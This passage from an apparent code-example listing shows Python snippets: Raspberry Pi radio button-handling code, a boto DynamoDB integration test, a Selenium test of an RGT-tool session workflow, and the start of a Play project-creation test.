			source = radio.getSource()
			log.message("Reload " + str(source), log.INFO)
			lcd.line2("Reloading ")
			reload(lcd,radio)
			radio.setReload(False)
			radio.setDisplayMode(radio.MODE_TIME)

		elif radio.optionChanged(): 
			log.message("optionChanged", log.DEBUG)
			if radio.alarmActive() and not radio.getTimer() and option == radio.ALARMSET:
				radio.setDisplayMode(radio.MODE_SLEEP)
				radio.mute()
			else:
				radio.setDisplayMode(radio.MODE_TIME)

			radio.optionChangedFalse()

		elif radio.loadNew():
			log.message("Load new  search=" + str(radio.getSearchIndex()), log.DEBUG)
			radio.playNew(radio.getSearchIndex())
			radio.setDisplayMode(radio.MODE_TIME)

		interrupt = True

	elif switch == UP_SWITCH:
		log.message("UP switch display_mode " + str(display_mode), log.DEBUG)

		if  display_mode != radio.MODE_SLEEP:
			if radio.muted():
				unmuteRadio(lcd,radio)

			if display_mode == radio.MODE_SOURCE:
				radio.toggleSource()
				radio.setReload(True)

			elif display_mode == radio.MODE_SEARCH:
				wait = 0.5
				while GPIO.input(UP_SWITCH):
					scroll_search(radio,UP)
					display_search(lcd,radio)
					time.sleep(wait)
					wait = 0.1

			elif display_mode == radio.MODE_OPTIONS:
				cycle_options(radio,UP)

			else:
				radio.channelUp()

			interrupt = True
		else:
			DisplayExitMessage(lcd)

	elif switch == DOWN_SWITCH:
		log.message("DOWN switch display_mode " + str(display_mode), log.DEBUG)

		if  display_mode != radio.MODE_SLEEP:
			if radio.muted():
				unmuteRadio(lcd,radio)

			if display_mode == radio.MODE_SOURCE:
				radio.toggleSource()
				radio.setReload(True)

			elif display_mode == radio.MODE_SEARCH:
				wait = 0.5
				while GPIO.input(DOWN_SWITCH):
					scroll_search(radio,DOWN)
					display_search(lcd,radio)
					time.sleep(wait)
					wait = 0.1

			elif display_mode == radio.MODE_OPTIONS:
				cycle_options(radio,DOWN)

			else:
				radio.channelDown()
			interrupt = True
		else:
			DisplayExitMessage(lcd)

	elif switch == LEFT_SWITCH:
		log.message("LEFT switch" ,log.DEBUG)

		if  display_mode != radio.MODE_SLEEP:
			if display_mode == radio.MODE_OPTIONS:
				toggle_option(radio,lcd,DOWN)
				interrupt = True

			elif display_mode == radio.MODE_SEARCH and input_source == radio.PLAYER:
				wait = 0.5
				while GPIO.input(LEFT_SWITCH):
					scroll_artist(radio,DOWN)
					display_search(lcd,radio)
					time.sleep(wait)
					wait = 0.1
				interrupt = True

			elif display_mode == radio.MODE_OPTIONS:
				interrupt = True

			else:
				# Decrease volume
				volChange = True
				while volChange:
					# Mute function (Both buttons depressed)
					if GPIO.input(RIGHT_SWITCH):
						radio.mute()
						if radio.alarmActive():
							radio.setDisplayMode(radio.MODE_SLEEP)
							interrupt = True
						displayLine4(lcd,radio,"Sound muted")
						time.sleep(2)
						volChange = False
						interrupt = True
					else:
						volume = radio.decreaseVolume()
						displayLine4(lcd,radio,"Volume " + str(volume))
						volChange = GPIO.input(LEFT_SWITCH)
						if volume <= 0:
							volChange = False
						time.sleep(0.1)
		else:
			DisplayExitMessage(lcd)

	elif switch == RIGHT_SWITCH:
		log.message("RIGHT switch" ,log.DEBUG)

		if  display_mode != radio.MODE_SLEEP:
			if display_mode == radio.MODE_OPTIONS:
				toggle_option(radio,lcd,UP)
				interrupt = True

			elif display_mode == radio.MODE_SEARCH and input_source == radio.PLAYER:
				wait = 0.5
				while GPIO.input(RIGHT_SWITCH):
					scroll_artist(radio,UP)
					display_search(lcd,radio)
					time.sleep(wait)
					wait = 0.1
				interrupt = True

			elif display_mode == radio.MODE_OPTIONS:
				interrupt = True
			else:
				# Increase volume
				volChange = True
				while volChange:
					# Mute function (Both buttons depressed)
					if GPIO.input(LEFT_SWITCH):
						radio.mute()
						if radio.alarmActive():
							radio.setDisplayMode(radio.MODE_SLEEP)
							interrupt = True
						displayLine4(lcd,radio,"Sound muted")
						time.sleep(2)
						volChange = False
						interrupt = True
					else:
						volume = radio.increaseVolume()
						displayLine4(lcd,radio,"Volume " + str(volume))
						volChange =  GPIO.input(RIGHT_SWITCH)
						if volume >= 100:
							volChange = False
						time.sleep(0.1)
		else:
			DisplayExitMessage(lcd)

	return interrupt

Example 23

Project: boto
Source File: test_highlevel.py
View license
    def test_integration(self):
        # Test creating a full table with all options specified.
        users = Table.create('users', schema=[
            HashKey('username'),
            RangeKey('friend_count', data_type=NUMBER)
        ], throughput={
            'read': 5,
            'write': 5,
        }, indexes=[
            KeysOnlyIndex('LastNameIndex', parts=[
                HashKey('username'),
                RangeKey('last_name')
            ]),
        ])
        self.addCleanup(users.delete)

        self.assertEqual(len(users.schema), 2)
        self.assertEqual(users.throughput['read'], 5)

        # Wait for it.
        time.sleep(60)

        # Make sure things line up if we're introspecting the table.
        users_hit_api = Table('users')
        users_hit_api.describe()
        self.assertEqual(len(users.schema), len(users_hit_api.schema))
        self.assertEqual(users.throughput, users_hit_api.throughput)
        self.assertEqual(len(users.indexes), len(users_hit_api.indexes))

        # Test putting some items individually.
        users.put_item(data={
            'username': 'johndoe',
            'first_name': 'John',
            'last_name': 'Doe',
            'friend_count': 4
        })

        users.put_item(data={
            'username': 'alice',
            'first_name': 'Alice',
            'last_name': 'Expert',
            'friend_count': 2
        })

        time.sleep(5)

        # Test batch writing.
        with users.batch_write() as batch:
            batch.put_item({
                'username': 'jane',
                'first_name': 'Jane',
                'last_name': 'Doe',
                'friend_count': 3
            })
            batch.delete_item(username='alice', friend_count=2)
            batch.put_item({
                'username': 'bob',
                'first_name': 'Bob',
                'last_name': 'Smith',
                'friend_count': 1
            })

        time.sleep(5)

        # Does it exist? It should?
        self.assertTrue(users.has_item(username='jane', friend_count=3))
        # But this shouldn't be there...
        self.assertFalse(users.has_item(
            username='mrcarmichaeljones',
            friend_count=72948
        ))

        # Test getting an item & updating it.
        # This is the "safe" variant (only write if there have been no
        # changes).
        jane = users.get_item(username='jane', friend_count=3)
        self.assertEqual(jane['first_name'], 'Jane')
        jane['last_name'] = 'Doh'
        self.assertTrue(jane.save())

        # Test strongly consistent getting of an item.
        # Additionally, test the overwrite behavior.
        client_1_jane = users.get_item(
            username='jane',
            friend_count=3,
            consistent=True
        )
        self.assertEqual(jane['first_name'], 'Jane')
        client_2_jane = users.get_item(
            username='jane',
            friend_count=3,
            consistent=True
        )
        self.assertEqual(jane['first_name'], 'Jane')

        # Write & assert the ``first_name`` is gone, then...
        del client_1_jane['first_name']
        self.assertTrue(client_1_jane.save())
        check_name = users.get_item(
            username='jane',
            friend_count=3,
            consistent=True
        )
        self.assertEqual(check_name['first_name'], None)

        # ...overwrite the data with what's in memory.
        client_2_jane['first_name'] = 'Joan'
        # Now a write that fails due to default expectations...
        self.assertRaises(exceptions.JSONResponseError, client_2_jane.save)
        # ... so we force an overwrite.
        self.assertTrue(client_2_jane.save(overwrite=True))
        check_name_again = users.get_item(
            username='jane',
            friend_count=3,
            consistent=True
        )
        self.assertEqual(check_name_again['first_name'], 'Joan')

        # Reset it.
        jane['username'] = 'jane'
        jane['first_name'] = 'Jane'
        jane['last_name'] = 'Doe'
        jane['friend_count'] = 3
        self.assertTrue(jane.save(overwrite=True))

        # Test the partial update behavior.
        client_3_jane = users.get_item(
            username='jane',
            friend_count=3,
            consistent=True
        )
        client_4_jane = users.get_item(
            username='jane',
            friend_count=3,
            consistent=True
        )
        client_3_jane['favorite_band'] = 'Feed Me'
        # No ``overwrite`` needed due to new data.
        self.assertTrue(client_3_jane.save())
        # Expectations are only checked on the ``first_name``, so what wouldn't
        # have succeeded by default does succeed here.
        client_4_jane['first_name'] = 'Jacqueline'
        self.assertTrue(client_4_jane.partial_save())
        partial_jane = users.get_item(
            username='jane',
            friend_count=3,
            consistent=True
        )
        self.assertEqual(partial_jane['favorite_band'], 'Feed Me')
        self.assertEqual(partial_jane['first_name'], 'Jacqueline')

        # Reset it.
        jane['username'] = 'jane'
        jane['first_name'] = 'Jane'
        jane['last_name'] = 'Doe'
        jane['friend_count'] = 3
        self.assertTrue(jane.save(overwrite=True))

        # Ensure that partial saves of a brand-new object work.
        sadie = Item(users, data={
            'username': 'sadie',
            'first_name': 'Sadie',
            'favorite_band': 'Zedd',
            'friend_count': 7
        })
        self.assertTrue(sadie.partial_save())
        serverside_sadie = users.get_item(
            username='sadie',
            friend_count=7,
            consistent=True
        )
        self.assertEqual(serverside_sadie['first_name'], 'Sadie')

        # Test the eventually consistent query.
        results = users.query_2(
            username__eq='johndoe',
            last_name__eq='Doe',
            index='LastNameIndex',
            attributes=('username',),
            reverse=True
        )

        for res in results:
            self.assertTrue(res['username'] in ['johndoe',])
            self.assertEqual(list(res.keys()), ['username'])

        # Ensure that queries with attributes don't return the hash key.
        results = users.query_2(
            username__eq='johndoe',
            friend_count__eq=4,
            attributes=('first_name',)
        )

        for res in results:
            self.assertEqual(res['first_name'], 'John')
            self.assertEqual(list(res.keys()), ['first_name'])

        # Test the strongly consistent query.
        c_results = users.query_2(
            username__eq='johndoe',
            last_name__eq='Doe',
            index='LastNameIndex',
            reverse=True,
            consistent=True
        )

        for res in c_results:
            self.assertEqual(res['username'], 'johndoe')

        # Test a query with query filters
        results = users.query_2(
            username__eq='johndoe',
            query_filter={
                'first_name__beginswith': 'J'
            },
            attributes=('first_name',)
        )

        for res in results:
            self.assertTrue(res['first_name'] in ['John'])

        # Test scans without filters.
        all_users = users.scan(limit=7)
        self.assertEqual(next(all_users)['username'], 'bob')
        self.assertEqual(next(all_users)['username'], 'jane')
        self.assertEqual(next(all_users)['username'], 'johndoe')

        # Test scans with a filter.
        filtered_users = users.scan(limit=2, username__beginswith='j')
        self.assertEqual(next(filtered_users)['username'], 'jane')
        self.assertEqual(next(filtered_users)['username'], 'johndoe')

        # Test deleting a single item.
        johndoe = users.get_item(username='johndoe', friend_count=4)
        johndoe.delete()

        # Set batch get limit to ensure keys with no results are
        # handled correctly.
        users.max_batch_get = 2

        # Test the eventually consistent batch get.
        results = users.batch_get(keys=[
            {'username': 'noone', 'friend_count': 4},
            {'username': 'nothere', 'friend_count': 10},
            {'username': 'bob', 'friend_count': 1},
            {'username': 'jane', 'friend_count': 3}
        ])
        batch_users = []

        for res in results:
            batch_users.append(res)
            self.assertIn(res['first_name'], ['Bob', 'Jane'])

        self.assertEqual(len(batch_users), 2)

        # Test the strongly consistent batch get.
        c_results = users.batch_get(keys=[
            {'username': 'bob', 'friend_count': 1},
            {'username': 'jane', 'friend_count': 3}
        ], consistent=True)
        c_batch_users = []

        for res in c_results:
            c_batch_users.append(res)
            self.assertTrue(res['first_name'] in ['Bob', 'Jane'])

        self.assertEqual(len(c_batch_users), 2)

        # Test count, but in a weak fashion. Because lag time.
        self.assertTrue(users.count() > -1)

        # Test query count
        count = users.query_count(
            username__eq='bob',
        )

        self.assertEqual(count, 1)

        # Test without LSIs (describe calls shouldn't fail).
        admins = Table.create('admins', schema=[
            HashKey('username')
        ])
        self.addCleanup(admins.delete)
        time.sleep(60)
        admins.describe()
        self.assertEqual(admins.throughput['read'], 5)
        self.assertEqual(admins.indexes, [])

        # A single query term should fail on a table with *ONLY* a HashKey.
        self.assertRaises(
            exceptions.QueryError,
            admins.query,
            username__eq='johndoe'
        )
        # But it shouldn't break on more complex tables.
        res = users.query_2(username__eq='johndoe')

        # Test putting with/without sets.
        mau5_created = users.put_item(data={
            'username': 'mau5',
            'first_name': 'dead',
            'last_name': 'mau5',
            'friend_count': 2,
            'friends': set(['skrill', 'penny']),
        })
        self.assertTrue(mau5_created)

        penny_created = users.put_item(data={
            'username': 'penny',
            'first_name': 'Penny',
            'friend_count': 0,
            'friends': set([]),
        })
        self.assertTrue(penny_created)

        # Test attributes.
        mau5 = users.get_item(
            username='mau5',
            friend_count=2,
            attributes=['username', 'first_name']
        )
        self.assertEqual(mau5['username'], 'mau5')
        self.assertEqual(mau5['first_name'], 'dead')
        self.assertTrue('last_name' not in mau5)

Example 24

Project: RGT-tool
Source File: testSession.py
View license
    def test_session_process(self):

        #Process to create a session with name session3
        #user logs in successfully and sees the sessions page
        self.can_goto_session_page("[email protected]", "123")

        # User clicks the create session link and sees the create session page
        create_session_link = self.browser.find_element_by_link_text("create")
        create_session_link.click()

        # user selects grid to create the session
        select_grid_field = self.browser.find_element_by_css_selector("select[id='gridSessionSelection']")
        self.assertIn('grid1', select_grid_field.text)

        # User selects the option with grid name 'grid1' and sees the grid with the
        # name 'grid1' in the input text.
        option_grid_fields = self.browser.find_elements_by_css_selector('option')
        option_grid_fields[1].click()

        # user enters the session name
        session_new_name = self.browser.find_element_by_id("sessionNameInputBox")
        session_new_name.send_keys('session3')

        # user checks the radio button to allow the participants to see the results
        show_results = self.browser.find_element_by_css_selector("input[value='Y']")
        show_results.click()

        # user creates session
        create_button = self.browser.find_element_by_css_selector("input[value='Create session']")
        create_button.click()

        # A dialog box appears with the message 'Session was created.' and user closes it
        self.wait_for_dialog_box_with_message("Session was created.")

        # user logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        # Facilitator admin logs in and selects the session with name session1
        self.facilitator_can_select_session("[email protected]", "123", "session1")

        # Participants panel shows two users with names User1 and User2
        participants_in_panel = self.browser.find_elements_by_class_name("respondedRequest")
        self.assertEqual(participants_in_panel[0].text, "User1 Participant")
        self.assertEqual(participants_in_panel[1].text, "User2 Participant")

        # Facilitator admin clicks the start session button
        start_session_button = self.browser.find_element_by_css_selector("input[value='Start session']")
        start_session_button.click()

        # Wait until the menu of the buttons changes to the session handling menu
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("input[value='Request alternatives/concerns']"))

        # The iteration label show iteration 1
        iteration_label = self.browser.find_element_by_id("iteration")
        self.assertIn("1", iteration_label.text)

        # The iteration status shows 'Check Values'
        current_iteration_status = self.browser.find_element_by_id("currentIterationStatus")
        self.assertIn("Check values", current_iteration_status.text)

        ### REQUEST ALTERNATIVES / CONCERNS STEP ###

        # Facilitator admin clicks the request alternatives and concerns button
        request_alternatives_concerns_button = self.browser.find_element_by_css_selector(
            "input[value='Request alternatives/concerns']")
        request_alternatives_concerns_button.click()

        # Wait until the session menu changes, to include the finish session button
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("input[value='Finish request']"))

        # The iteration status shows 'Alternatives / Concerns'
        current_iteration_status = self.browser.find_element_by_id("currentIterationStatus")
        self.assertIn("Alternatives / Concerns", current_iteration_status.text)

        # Facilitator admin logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        ### RESPOND ALTERNATIVES / CONCERN STEP ###

        # Participant user1 logs in, goes to participating session
        # page and selects the session session1 of admin
        self.participant_can_select_session("[email protected]", "123", "Admin Istrator: session1", False)

        # The number of participants shows 0/2 which means that none participant responded yet
        session_details_body = self.browser.find_element_by_id("sessionDetails")
        self.assertIn("0/2", session_details_body.text)

        # Participant user1 mouse over to alternative_2
        # (because there are two grids, there are also two alternative fields with the same name)
        alternatives_with_name_alternative_2 = self.browser.find_elements_by_name("alternative_2_name")
        ActionChains(self.browser).move_to_element(alternatives_with_name_alternative_2[1]).perform()

        # Participant user1 clicks the button to add a column
        add_column_button = self.browser.find_element_by_xpath(
            "//div[@class='colMenuDiv' and contains(@style, 'block')]/a[2]/img[@class='addImage']")
        add_column_button.click()

        # Participant user1 types value for alternative_3
        alternative_3_name = self.browser.find_element_by_name("alternative_3_name")
        alternative_3_name.send_keys('a3')

        # Participant user1 sends the response and logs out
        send_response_button = self.browser.find_element_by_css_selector("input[value='Send response']")
        send_response_button.click()

        self.wait_for_dialog_box_with_message("Response was sent.")

        self.browser.refresh()
        time.sleep(2)

        # The number of participants shows 1/2 which means that one out of 2 participants responded
        # and the response status says Response was sent
        session_details_body = self.browser.find_element_by_id("sessionDetails")
        self.assertIn("1/2", session_details_body.text)
        self.assertIn("Response was sent at:", session_details_body.text)

        # Participant user1 logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        # Participant user2 logs in, goes to participating session
        # page and selects the session session1 of user admin
        self.participant_can_select_session("[email protected]", "123", "Admin Istrator: session1", False)

        # The number of participants shows 1/2 which means that one out of 2 participants responded
        session_details_body = self.browser.find_element_by_id("sessionDetails")
        self.assertIn("1/2", session_details_body.text)

        # Participant user2 mouse over concern_3_left
        # (because there are two grids, there are also two concerns with the same name)
        concerns_with_name_concern_3_left = self.browser.find_elements_by_name("concern_3_left")
        ActionChains(self.browser).move_to_element(concerns_with_name_concern_3_left[1]).perform()

        # Participant user2 clicks the button to add a row
        add_row_button = self.browser.find_element_by_xpath(
            "//div[@class='gridRowMenu leftRowMenuDiv' and contains(@style, 'block')]/a[2]/img[@class='addImage']")
        add_row_button.click()

        # Participant user2 types left and right value for concern_4
        concern_4_left = self.browser.find_element_by_name("concern_4_left")
        concern_4_left.send_keys('l04')
        concern_4_right = self.browser.find_element_by_name("concern_4_right")
        concern_4_right.send_keys('r04')

        # Participant user2 mouse over concern_4_left
        concern_4_left = self.browser.find_element_by_name("concern_4_left")
        ActionChains(self.browser).move_to_element(concern_4_left).perform()

        # Participant user2 clicks the button to add a row
        add_row_button = self.browser.find_element_by_xpath(
            "//div[@class='gridRowMenu leftRowMenuDiv' and contains(@style, 'block')]/a[2]/img[@class='addImage']")
        add_row_button.click()

        # Participant user2 types left and right value for concern_5
        concern_5_left = self.browser.find_element_by_name("concern_5_left")
        concern_5_left.send_keys('l05')
        concern_5_right = self.browser.find_element_by_name("concern_5_right")
        concern_5_right.send_keys('r05')

        # Participant user2 sends the response
        send_response_button = self.browser.find_element_by_css_selector("input[value='Send response']")
        send_response_button.click()

        self.wait_for_dialog_box_with_message("Response was sent.")

        # Refresh the page after response was sent
        self.browser.refresh()

        time.sleep(1)

        # The number of participants shows 2/2 which means that all participants responded
        # and the response status says Response was sent
        session_details_body = self.browser.find_element_by_id("sessionDetails")
        self.assertIn("2/2", session_details_body.text)
        self.assertIn("Response was sent at:", session_details_body.text)

        # Participant user2 logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        ### REQUEST RATINGS STEP ###

        # Facilitator admin logs in, selects the session with name session1
        self.facilitator_can_select_session("[email protected]", "123", "session1")

        # Facilitator admin clicks the finish request button
        finish_request_button = self.browser.find_element_by_css_selector("input[value='Finish request']")
        finish_request_button.click()

        # Wait until the session menu changes, to include the request ratings button
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("input[value='Request ratings']"))

        # The iteration label shows iteration 2
        iteration_label = self.browser.find_element_by_id("iteration")
        self.assertIn("2", iteration_label.text)

        # The iteration status shows 'Check values'
        current_iteration_status = self.browser.find_element_by_id("currentIterationStatus")
        self.assertIn("Check values", current_iteration_status.text)

        # Facilitator admin selects from the select field the results from iteration 1
        show_respond_from_iterations_options = self.browser.find_elements_by_xpath(
            "//select[@id='mySessionsContentSessionIterationSelect']/option")
        show_respond_from_iterations_options[1].click()

        # Wait until the results from the selected iteration appear
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_id("resultAlternativeConcernTablesDiv"))

        # Facilitator admin clicks the button to download results
        download_result1_button = self.browser.find_element_by_id("downloadResultsButton")
        download_result1_button.click()

        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("select[name='convertTo']"))

        # User types value for filename
        grid_file_name = self.browser.find_element_by_name("fileName")
        grid_file_name.send_keys('resultsIteration1')

        close_button = self.browser.find_element_by_css_selector("a[class='ui-dialog-titlebar-close ui-corner-all']")
        close_button.click()

        # Facilitator admin mouse over to alternative_2
        alternative_2_name = self.browser.find_element_by_name("alternative_2_name")
        ActionChains(self.browser).move_to_element(alternative_2_name).perform()

        # Facilitator admin clicks the button to add a column
        add_column_button = self.browser.find_element_by_xpath(
            "//div[@class='colMenuDiv' and contains(@style, 'block')]/a[2]/img[@class='addImage']")
        add_column_button.click()

        # Facilitator admin types value for alternative_3
        alternative_3_name = self.browser.find_element_by_name("alternative_3_name")
        alternative_3_name.send_keys('a3')

        # Facilitator admin mouse over to concern_3_left
        concern_3_left = self.browser.find_element_by_name("concern_3_left")
        ActionChains(self.browser).move_to_element(concern_3_left).perform()

        # Facilitator admin clicks the button to add a row
        add_row_button = self.browser.find_element_by_xpath(
            "//div[@class='gridRowMenu leftRowMenuDiv' and contains(@style, 'block')]/a[2]/img[@class='addImage']")
        add_row_button.click()

        # Facilitator admin types left and right value for concern_4
        concern_4_left = self.browser.find_element_by_name("concern_4_left")
        concern_4_left.send_keys('l04')
        concern_4_right = self.browser.find_element_by_name("concern_4_right")
        concern_4_right.send_keys('r04')

        # Facilitator admin mouse over concern_4_left
        concern_4_left = self.browser.find_element_by_name("concern_4_left")
        ActionChains(self.browser).move_to_element(concern_4_left).perform()

        # Facilitator admin clicks the button to add a row
        add_row_button = self.browser.find_element_by_xpath(
            "//div[@class='gridRowMenu leftRowMenuDiv' and contains(@style, 'block')]/a[2]/img[@class='addImage']")
        add_row_button.click()

        # Facilitator admin types left and right value for concern5
        concern_5_left = self.browser.find_element_by_name("concern_5_left")
        concern_5_left.send_keys('l05')
        concern_5_right = self.browser.find_element_by_name("concern_5_right")
        concern_5_right.send_keys('r05')

        self.fill_empty_ratings(False)

        # Facilitator admin saves the new grid
        save_changes_button = self.browser.find_element_by_css_selector("input[value='Save changes']")
        save_changes_button.click()

        # A dialog box appears with the message 'Grid was saved'
        self.wait_for_dialog_box_with_message("Grid was saved")

        # Facilitator admin clicks the clear results button to clear the results
        clear_results_button = self.browser.find_element_by_css_selector("input[value='Clear results']")
        clear_results_button.click()

        # Wait until the results are cleared
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_id("mySessionsContentResultDiv").text == "")

        # Facilitator admin clicks the request ratings button
        request_ratings_button = self.browser.find_element_by_css_selector("input[value='Request ratings']")
        request_ratings_button.click()

        # Wait until the session menu changes, to include the finish session button
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("input[value='Finish request']"))

        # The iteration status shows 'Ratings / Weights'
        current_iteration_status = self.browser.find_element_by_id("currentIterationStatus")
        self.assertIn("Ratings / Weights", current_iteration_status.text)

        # Facilitator clicks the show dendrogram button and gets the dendrogram
        show_dendrogram_button = self.browser.find_element_by_css_selector("input[value='Show dendrogram']")
        show_dendrogram_button.click()

        time.sleep(2)

        # Wait until the dendrogram appears successfully
        WebDriverWait(self.browser, 10).until(lambda x: self.browser.find_element_by_class_name("dendrogramTitle"))

        # Facilitator admin logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        ### RESPOND RATINGS STEP ###

        # Participant with the name user1 logs in, goes to participating session
        # page and selects the session session1 of user admin
        self.participant_can_select_session("[email protected]", "123", "Admin Istrator: session1", False)

        # Participant user1 types some values for the ratings
        #self.fill_empty_ratings(True)

        # Participant user1 sends the response
        send_response_button = self.browser.find_element_by_css_selector("input[value='Send response']")
        send_response_button.click()

        self.wait_for_dialog_box_with_message("Response was sent.")

        # Participant user1 logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        # Participant with the name user2 logs in, goes to participating session
        # page and selects the session session1 of user admin
        self.participant_can_select_session("[email protected]", "123", "Admin Istrator: session1", False)

        # Participant user2 types some values for the ratings
        #self.fill_empty_ratings(True)

        # Participant user2 sends the response
        send_response_button = self.browser.find_element_by_css_selector("input[value='Send response']")
        send_response_button.click()

        self.wait_for_dialog_box_with_message("Response was sent.")

        # Participant user2 logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        ### END SESSION STEP ###

        # Facilitator admin logs in, selects the session with name session1
        self.facilitator_can_select_session("[email protected]", "123", "session1")

        # Facilitator admin clicks the finish request button
        finish_request_button = self.browser.find_element_by_css_selector("input[value='Finish request']")
        finish_request_button.click()

        # Wait until the session menu changes, to include the end session button
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("input[value='End session']"))

        # The iteration label shows iteration 2
        iteration_label = self.browser.find_element_by_id("iteration")
        self.assertIn("3", iteration_label.text)

        # The iteration status shows 'Check values'
        current_iteration_status = self.browser.find_element_by_id("currentIterationStatus")
        self.assertIn("Check values", current_iteration_status.text)

        # Facilitator admin selects from the select field the results from iteration 2
        show_respond_from_iterations_options = self.browser.find_elements_by_xpath(
            "//select[@id='mySessionsContentSessionIterationSelect']/option")
        show_respond_from_iterations_options[2].click()

        # Wait until the results from the selected iteration appear
        WebDriverWait(self.browser, 10).until(lambda x: self.browser.find_element_by_id("clearResultsButton"))

        time.sleep(2)

        download_result2_button = self.browser.find_element_by_css_selector("input[id='downloadResultsButton']")
        download_result2_button.click()

        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("select[name='convertTo']"))

        # User types value for filename
        grid_file_name = self.browser.find_element_by_name("fileName")
        grid_file_name.send_keys('resultsIteration2')

        close_button = self.browser.find_element_by_css_selector("a[class='ui-dialog-titlebar-close ui-corner-all']")
        close_button.click()

        field = self.browser.find_element_by_id('ratio_concer1_alternative1')
        field.send_keys('1')

        # Facilitator admin saves the changes
        save_changes_button = self.browser.find_element_by_css_selector("input[value='Save changes']")
        save_changes_button.click()

        # A dialog box appears with the message 'Grid was saved'
        self.wait_for_dialog_box_with_message("Grid was saved")

        # Facilitator clicks the show dendrogram button and gets the dendrogram
        show_dendrogram_button = self.browser.find_element_by_css_selector("input[value='Show dendrogram']")
        show_dendrogram_button.click()

        # Wait until the dendrogram appears successfully
        WebDriverWait(self.browser, 10).until(lambda x: self.browser.find_element_by_tag_name("svg"))

        time.sleep(1)

        # Facilitator admin clicks the end session button
        end_session_button = self.browser.find_element_by_css_selector("input[value='End session']")
        end_session_button.click()

        # And confirms ending the session
        confirm_button = self.browser.find_element_by_css_selector(".ui-dialog-buttonset button")
        confirm_button.click()

        # Wait until the status change to Closed
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_id("currentIterationStatus").text == "Closed")

        # Facilitator admin logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        # Facilitator admin logs in, selects the session with name session1
        self.facilitator_can_select_session("[email protected]", "123", "session1")

        # Facilitator clicks the show dendrogram button and gets the dendrogram
        show_dendrogram_button = self.browser.find_element_by_css_selector("input[value='Show dendrogram']")
        show_dendrogram_button.click()

        # Wait until the dendrogram appears successfully
        WebDriverWait(self.browser, 10).until(lambda x: self.browser.find_element_by_tag_name("svg"))

        time.sleep(1)

        # Facilitator mouse over dendrogram
        dendrogram_image = self.browser.find_element_by_tag_name("svg")
        ActionChains(self.browser).move_to_element(dendrogram_image).perform()

        save_image_button = self.browser.find_element_by_css_selector("img[id='saveButtonImg']")
        save_image_button.click()

        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("select[name='convertTo']"))

        # Facilitator types value for filename
        session_file_name = self.browser.find_element_by_name("fileName")
        session_file_name.send_keys('dendrogram')

        #for future use
        #download_button = self.browser.find_element_by_css_selector("button[class='ui-button ui-widget ui-state-default ui-corner-all ui-button-text-only']")
        #download_button.click()

        close_button = self.browser.find_element_by_css_selector("a[class='ui-dialog-titlebar-close ui-corner-all']")
        close_button.click()

        # Facilitator admin logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        # Participant with the name user1 logs in, goes to participating session
        # page and selects the session session1 of user admin
        self.participant_can_select_session("[email protected]", "123", "Admin Istrator: session1", False)

        show_participant_respond_from_iterations_options = self.browser.find_elements_by_xpath(
            "//select[@id='responseSelection']/option")
        show_participant_respond_from_iterations_options[2].click()

        # Wait until the response from the selected iteration appear
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_id("participationSessionsContentGridsDiv"))

        show_participant_result_from_iterations_options = self.browser.find_elements_by_xpath(
            "//select[@id='resultSelection']/option")
        show_participant_result_from_iterations_options[2].click()

        # Wait until the results from the selected iteration appear
        WebDriverWait(self.browser, 10).until(lambda x: self.browser.find_element_by_id("clearResultsButton"))

        time.sleep(2)

        # user logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        # Facilitator admin logs in, selects the session with name session1
        self.facilitator_can_select_session("[email protected]", "123", "session1")

        # Facilitator clicks the button to save the grid
        concern_1_left = self.browser.find_element_by_name("concern_1_left")
        ActionChains(self.browser).move_to_element(concern_1_left).perform()
        save_grid_button = self.browser.find_element_by_css_selector("img[title='download grid as']")
        save_grid_button.click()

        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("select[name='convertTo']"))

        # User types value for filename
        grid_file_name = self.browser.find_element_by_name("fileName")
        grid_file_name.send_keys('sessionGrid')

        #for future use
        #download_button = self.browser.find_element_by_css_selector("button[class='ui-button ui-widget ui-state-default ui-corner-all ui-button-text-only']")
        #download_button.click()

        close_button = self.browser.find_element_by_css_selector("a[class='ui-dialog-titlebar-close ui-corner-all']")
        close_button.click()

        # Facilitator admin logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

Example 25

Project: databus
Source File: tests.py
View license
    def testSimpleProjectCreation(self):

        # Well
        step('Hello, I\'m a developer')
        
        self.working_directory = bootstrapWorkingDirectory('i-am-working-here')
        
        # play new yop
        step('Create a new project')
        
        self.play = callPlay(self, ['new', '%s/yop' % self.working_directory, '--name=YOP'])
        self.assert_(waitFor(self.play, 'The new application will be created'))
        self.assert_(waitFor(self.play, 'OK, the application is created'))
        self.assert_(waitFor(self.play, 'Have fun!'))
        self.play.wait()
        
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/controllers')))
